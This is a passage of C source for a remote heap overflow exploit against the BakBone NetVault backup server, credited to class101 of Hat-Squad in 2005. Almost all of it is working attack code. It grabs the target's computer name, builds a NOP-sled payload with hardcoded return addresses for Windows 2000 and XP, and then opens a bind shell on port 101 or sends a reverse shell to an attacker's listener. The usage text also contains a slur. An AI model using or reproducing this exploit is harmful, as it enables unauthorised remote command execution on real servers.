- "\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
- "\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"
- "\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
- "\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
- "\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";
-
- char grabcpname[] =
- "\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
- "\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
- "\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"
- "\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x09\x00\x00\x00\x00\x00\x00\x00\x00";
-
- char payload[1024],payload2[20000000],recvbuf[1024],ver2[1024],
- cpname[1024],sz[1024],szb[1024],szb2[1024];
- int tot,tot2,l00p=0;
-
- char sip[3],spo[1],pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
- char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C], ws2_32.dll, w2k SP4 EN
- char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74], MSVCR71.dll, XP SP1a-1-0 EN
- char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 EN
- char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
- char padA[]="\x00\x00\x00";
- char szc[]="\xFF\xFF";
-
- // rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing RtlEnterCriticalSection on 2k SP4
- //you will prolly need to repair this repair[] for your os :>
- //I did it quickly: mov dword ptr [eax-77],77F82060
- //for litchfield this method is reliable due to the fixed address 0x7FFDF020
- //for me that's a crap method like others known heap exploitations
- //because you realiably repair the functions across all nt based os?, and where to realiably jump...,
- //and also the call to drwtsn32, right before ExitProcess(), acts as a breakpoint, and
- //your shellcode will be executed once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' ExitProcess() :)
-
- #ifdef WIN32
- WSADATA wsadata;
- #endif
-
- void ver();
- void usage(char* us);
- void sl(int time);
-
- int main(int argc,char *argv[])
- {
- ver();
- int check1, check2, rc, i, j, k;
- unsigned long gip;
- unsigned short gport;
- char *what, *where, *os;
- loop:
- if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
- if (argc==5){usage(argv[0]);return -1;}
- if (strlen(argv[2])<7){usage(argv[0]);return -1;}
- if (argc==6)
- {
- if (strlen(argv[4])<7){usage(argv[0]);return -1;}
- }
- #ifndef WIN32
- if (argc==6)
- {
- gip=inet_addr(argv[4])^(long)0x00000000;
- gport=htons(atoi(argv[5]))^(short)0x0000;
- memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
- check1=strlen(&sip[0]);check2=strlen(&spo[0]);
- if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
- printf("[+] error, the IP has a null byte in hex...\n");return -1;}
- if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
- }
- #define Sleep sleep
- #define SOCKET int
- #define closesocket(s) close(s)
- #else
- if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");
- return -1;}
- if (argc==6)
- {
- gip=inet_addr(argv[4])^(ULONG)0x00000000;
- gport=htons(atoi(argv[5]))^(USHORT)0x0000;
- memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
- check1=strlen(&sip[0]);check2=strlen(&spo[0]);
- if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
- printf("[+] error, the IP has a null byte in hex...\n");return -1;}
- if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
- }
- #endif
- int ip=htonl(inet_addr(argv[2])), port;
- if (argc==4||argc==6){port=atoi(argv[3]);} else port=20031;
- SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
- s=socket(AF_INET,SOCK_STREAM,0);
- if (s==-1){printf("[+] socket() error\n");return -1;}
- if (atoi(argv[1]) == 1){what=ret1;where=ret2;os="Win2k SP4 Server English\n[+]
- Win2k SP4 Pro English\n";}
- if (atoi(argv[1]) == 2){what=ret1c;where=ret4;os="WinXP SP0 Pro. English\n[+]
- WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
- if (l00p==0){printf("[+] TARGET: %s\n",os);sl(1);}
- server.sin_family=AF_INET;
- server.sin_addr.s_addr=htonl(ip);
- server.sin_port=htons(port);
- connect(s,( struct sockaddr *)&server,sizeof(server));
- timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
- switch(select(s+1,NULL,&mask,NULL,&timeout))
- {
- case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
- case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
- default:
- if(FD_ISSET(s,&mask))
- {
- if (l00p==0)
- {
- printf("[+] connection 1: grabbing computername via netvault...\n");
- sl(2);
- send(s,grabcpname,sizeof(grabcpname)-1,0);
- rc = recv(s,recvbuf,sizeof(recvbuf),0);
- if (rc==-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+] not netvault or
- patched, aborting..\n");return -1;}
- else if (rc==0){printf("[+] nothing received, not netvault or patched, aborting..\n");return -1;}
- else printf("[+] analyzing packets, sorting computername\n");
- sl(2);
- printf("[+] bufsize: %d\n",rc);sl(1);
- for (i=80,j=0;recvbuf[i]!=0;i++,j++)
- {
- memset(cpname+j,recvbuf[i],1);
- }
- memset(sz,strlen(cpname)+1,1);
- memset(ver2,recvbuf[rc-37],1);memset(ver2+1,0x2E,1);
- memset(ver2+2,recvbuf[rc-35],1);memset(ver2+3,0x2E,1);
- memset(ver2+4,recvbuf[rc-34],1);
- printf("[+] cmpname: %s\n",cpname);sl(1);
- printf("[+] version: %s\n",ver2);sl(1);l00p++;
- closesocket(s);
- #ifdef WIN32
- WSACleanup();
- #endif
- goto loop;
- }
- printf("[+]\n[+] connection 2: modding payload regarding computername and length\n");sl(1);
- printf("[+] loading attack\n");sl(1);
- /*the cpname length is important, that's why we reajust EAX and ECX
- function of cpnamelength.*/
- k=7-strlen(cpname);
- memset(payload,0x41,1);
- // rtlmethod memset(payload2,0x90,k+32417); rtl
- // rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
- // rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
- // rtlmethod memcpy(payload2+k+31902, repair, 7);
- memset(payload2,0x90,k+35431);
- memcpy(payload2+k+32413,pad,2);memcpy(payload2+k+32417,what,4);
- memcpy(payload2+k+32421,where,4);memcpy(payload2+k+32426,pad2,5);
- if (argc==6)
- {
- memcpy(&scode2[167], &gip, 4);
- memcpy(&scode2[173], &gport, 2);
- memcpy(payload2+k+31914,scode2,strlen(scode2));
- }
- else memcpy(payload2+k+31914,scode1,strlen(scode1));
- tot=sizeof(padA)-1+sizeof(scodeA)-1+sizeof(scodeB)-1+sizeof(scodeC)-1+
- sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
- tot2=tot-192;
- memcpy(szb,&tot,2);memcpy(&scodeA[0],&szb,strlen(szb));
- memcpy(szb2,&tot2,2);memcpy(&scodeB[1],&szb2,strlen(szb2));
- memcpy(scodeC+254,szc,2);
- printf("[+] sh0uting the heap!\n");sl(3);
- if (send(s,scodeA,sizeof(scodeA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,scodeB,sizeof(scodeB)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,sz,strlen(sz),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,padA,sizeof(padA)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,cpname,strlen(cpname),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,scodeC,sizeof(scodeC)-1,0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending error, the server prolly rebooted.\n");
- return -1;}
- sl(6);
- printf("[+]\n[+] size of payload: %d\n",tot);
- if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
- else printf("[+] payload sent, use telnet %s:101 to get a shell\n",inet_ntoa(server.sin_addr));
- return 0;
- }
- }
- closesocket(s);
- #ifdef WIN32
- WSACleanup();
- #endif
- return 0;
- }
-
-
- void usage(char* us)
- {
-
- printf(" \n");
- printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
- printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
- printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT reverse mode) \n");
- printf("TARGETS: \n");
- printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
- printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
- printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");
- printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
- printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
- printf("NOTE: \n");
- printf("The exploit bind a cmdshell port 101 or \n");
- printf("reverse a cmdshell on your listener. \n");
- printf("A wildcard (*) mean tested working, else, supposed working. \n");
- printf("A symbol (-) mean all. \n");
- printf(" Compilation msvc6, cygwin, Linux. \n");
- printf(" \n");
- return;
- }
-
- void ver()
- {
- printf(" \n");
- printf("============================[v0.1]====\n");
- printf("=====BakBone NetVault, Backup Server===============\n");
- printf("=====Clientname, Remote Heap Overflow Exploit==========\n");
- printf("====coded by class101======[Hat-Squad.com 2005]=====\n");
- printf("============================================\n");
- printf(" \n");
- }
-
- void sl(int time)
- {
- #ifdef WIN32
- Sleep(time*1000);
- #else
- Sleep(time);
- #endif
- }
-
-
-